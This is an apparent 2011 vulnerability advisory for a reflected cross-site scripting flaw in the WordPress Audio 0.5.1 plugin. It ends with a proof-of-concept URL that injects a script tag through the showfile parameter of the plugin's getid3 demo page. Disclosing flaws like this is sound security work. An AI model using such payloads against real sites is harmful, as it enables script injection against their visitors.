WordPress Audio 0.5.1 Reflected Cross-site Scripting

------------------------------------------------------------------------
Software................WordPress Audio 0.5.1
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.wordpress-plugin.org/tag/audio-0-5-1/
Discovery Date..........1/23/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in WordPress Audio
0.5.1 can be exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/wordpress/wp-content/plugins/audio/getid3/demos/demo.browse.php?showfile=%3Cscript%3Ealert(0)%3C/script%3E